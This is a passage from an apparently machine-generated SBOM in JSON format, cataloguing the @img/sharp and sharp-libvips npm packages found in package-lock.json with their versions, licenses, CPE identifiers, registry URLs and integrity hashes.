:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-darwin-arm64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-darwin-arm64/-/sharp-darwin-arm64-0.34.5.tgz","integrity":"sha512-imtQ3WMJXbMY4fxb/Ndp6HBTNVtWCUI0WdobyheGf5+ad6xX8VIDO8u2xE4qc/fr08CKG/7dDseFtn6M6g/r3w==","dependencies":null}},{"id":"0e26c2a4fd47f5b6","name":"@img/sharp-darwin-x64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-darwin-x64:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-darwin-x64:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_darwin_x64:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_darwin_x64:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-darwin-x64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-darwin-x64/-/sharp-darwin-x64-0.34.5.tgz","integrity":"sha512-YNEFAF/4KQ/PeW0N+r+aVVsoIY0/qxxikF2SWdp+NRkmMB7y9LBZAVqQ4yhGCm/H3H270OSykqmQMKLBhBJDEw==","dependencies":null}},{"id":"c127f66367bb283f","name":"@img/sharp-libvips-darwin-arm64","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-darwin-arm64:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-darwin-arm64:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_darwin_arm64:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_darwin_arm64:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-darwin-arm64/-/sharp-libvips-darwin-arm64-1.2.4.tgz","integrity":"sha512-zqjjo7RatFfFoP0MkQ51jfuFZBnVE2pRiaydKJ1G/rHZvnsrHAOcQALIi9sA5co5xenQdTugCvtb1cuf78Vf4g==","dependencies":null}},{"id":"9896d5c1cacbd583","name":"@img/sharp-libvips-darwin-x64","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-darwin-x64:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-darwin-x64:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_darwin_x64:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_darwin_x64:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-darwin-x64/-/sharp-libvips-darwin-x64-1.2.4.tgz","integrity":"sha512-1IOd5xfVhlGwX+zXv2N93k0yMONvUlANylbJw1eTah8K/Jtpi15KC+WSiaX/nBmbm2HxRM1gZ0nSdjSsrZbGKg==","dependencies":null}},{"id":"35db8dcfe65acc63","name":"@img/sharp-libvips-linux-arm","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-linux-arm/-/sharp-libvips-linux-arm-1.2.4.tgz","integrity":"sha512-bFI7xcKFELdiNCVov8e44Ia4u2byA+l3XtsAj+Q8tfCwO6BQ8iDojYdvoPMqsKDkuoOo+X6HZA0s0q11ANMQ8A==","dependencies":null}},{"id":"b77c206e5d189694","name":"@img/sharp-libvips-linux-arm64","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm64:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm64:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm64:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm64:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-linux-arm64/-/sharp-libvips-linux-arm64-1.2.4.tgz","integrity":"sha512-excjX8DfsIcJ10x1Kzr4RcWe1edC9PquDRRPx3YVCvQv+U5p7Yin2s32ftzikXojb1PIFc/9Mt28/y+iRklkrw==","dependencies":null}},{"id":"0a49b35ad8071788","name":"@img/sharp-libvips-linux-ppc64","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-ppc64:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-ppc64:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_ppc64:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_ppc64:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-linux-ppc64/-/sharp-libvips-linux-ppc64-1.2.4.tgz","integrity":"sha512-FMuvGijLDYG6lW+b/UvyilUWu5Ayu+3r2d1S8notiGCIyYU/76eig1UfMmkZ7vwgOrzKzlQbFSuQfgm7GYUPpA==","dependencies":null}},{"id":"69aa9726ceb1125a","name":"@img/sharp-libvips-linux-riscv64","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-riscv64:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-riscv64:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_riscv64:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_riscv64:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-linux-riscv64/-/sharp-libvips-linux-riscv64-1.2.4.tgz","integrity":"sha512-oVDbcR4zUC0ce82teubSm+x6ETixtKZBh/qbREIOcI3cULzDyb18Sr/Wcyx7NRQeQzOiHTNbZFF1UwPS2scyGA==","dependencies":null}},{"id":"b12e72c485584ae0","name":"@img/sharp-libvips-linux-s390x","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-s390x:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-s390x:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_s390x:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_s390x:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-linux-s390x/-/sharp-libvips-linux-s390x-1.2.4.tgz","integrity":"sha512-qmp9VrzgPgMoGZyPvrQHqk02uyjA0/QrTO26Tqk6l4ZV0MPWIW6LTkqOIov+J1yEu7MbFQaDpwdwJKhbJvuRxQ==","dependencies":null}},{"id":"a57b531e02329e6d","name":"@img/sharp-libvips-linux-x64","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-x64:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux-x64:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_x64:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux_x64:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-linux-x64/-/sharp-libvips-linux-x64-1.2.4.tgz","integrity":"sha512-tJxiiLsmHc9Ax1bz3oaOYBURTXGIRDOD